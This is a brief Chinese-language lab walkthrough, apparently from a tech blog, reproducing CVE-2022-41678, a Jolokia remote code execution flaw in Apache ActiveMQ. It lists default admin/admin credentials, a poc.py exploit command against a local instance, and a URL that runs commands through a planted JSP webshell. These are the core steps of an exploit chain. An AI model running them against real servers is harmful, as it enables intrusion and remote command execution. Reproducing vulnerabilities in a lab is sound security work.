activemq-CVE-2022-41678

  • 开发
  • 32

Apache ActiveMQ Jolokia 后台远程代码执行漏洞

Apache ActiveMQ在5.16.5,5.17.3版本及以前,后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。

启动环境

admin/admin

方法一:利用poc

这个方法受到ActiveMQ版本的限制,因为Log4j2是在5.17.0中才引入Apache ActiveMQ

方法二:

python poc.py -u admin -p admin --exploit jfr http://localhost:8161

http://192.168.62.131:8161/admin/shelljfr.jsp?cmd=id

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-10 07:20:03       99 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-10 07:20:03       107 阅读

  9. 在Django里面运行非项目文件

    2024-07-10 07:20:03       90 阅读

  19. Python语言-面向对象

    2024-07-10 07:20:03       98 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-10 07:20:03       96 阅读

热门阅读

  1. 每日一道算法题 LCR 150. 彩灯装饰记录 II

    2024-07-10 07:20:03       33 阅读

  3. Ubuntu 添加so库搜索路径

    2024-07-10 07:20:03       33 阅读

  7. 文件格式是.pb应该怎么查看?

    2024-07-10 07:20:03       37 阅读

  8. 高考假期预习指南

    2024-07-10 07:20:03       34 阅读

  17. YOLOv5/v7 应用轻量级通用上采样算子CARAFE

    2024-07-10 07:20:03       29 阅读

  22. 探索Hash Router:构建单页应用的基石

    2024-07-10 07:20:03       27 阅读

  23. 为什么root密码正确在登录系统时仍然报错permission denied

    2024-07-10 07:20:03       25 阅读

  25. Django学习收尾

    2024-07-10 07:20:03       29 阅读

  29. Linux Vim全面教程

    2024-07-10 07:20:03       30 阅读

  30. 【Linux命令基础】vim的简介

    2024-07-10 07:20:03       28 阅读